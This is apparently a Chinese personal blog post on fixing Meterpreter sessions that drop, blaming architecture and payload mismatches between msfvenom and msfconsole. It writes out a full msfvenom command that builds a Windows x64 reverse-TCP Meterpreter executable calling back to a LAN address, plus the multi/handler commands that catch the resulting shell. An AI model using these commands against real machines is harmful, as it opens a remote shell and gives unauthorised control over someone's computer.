问题
🍺用的挺好的MSF
突然出了问题,直接裂开
如下图,Meterpreter session异常终止
当你试着发现问题时
只会不断增加session值
🍺参考文章
垂死挣扎?拯救你的Meterpreter session
🍺根据自己的环境情况,判断出现的问题
我这里出现两个问题:
1
、架构混淆(32位/64位
),在使用Metasploit时,在选择处理器体系结构时犯错误,将它们混淆在一起
🍺解决的办法是:
确保不要在msfvenom和msfconsole中混用
了处理器体系结构,两端只能使用32位或64位
payloads,32位、64位payloads示例:
2
、payload不匹配,我们可能在msfvenom中指定使用windows/meterpreter/reverse_https
模块payload,而在msfconsole中,却错误地选择了windows/meterpreter/reverse_tcp
模块payload
🍺解决方法:对payload的匹配
(1)
、生成独立的meterpreter payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.106 LPORT=5555 -f exe > 5115.exe
(2)
、设置multi handler listener
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.0.106
msf5 exploit(multi/handler) > set LPORT 5555
msf5 exploit(multi/handler) > run
🍺了解出现的问题,重新来一次
执行exe文件的是windows64位电脑,所以选择windows/64位
的,同时确保multi handler listener使用的payload与
前面生成exe文件所使用的windows/x64/meterpreter/reverse_tcp
是一样的
成功反弹Shell
感想:回过头看看,今天确实傻里傻气的,,,,,折腾了大半天,啥跟啥啊(裂开)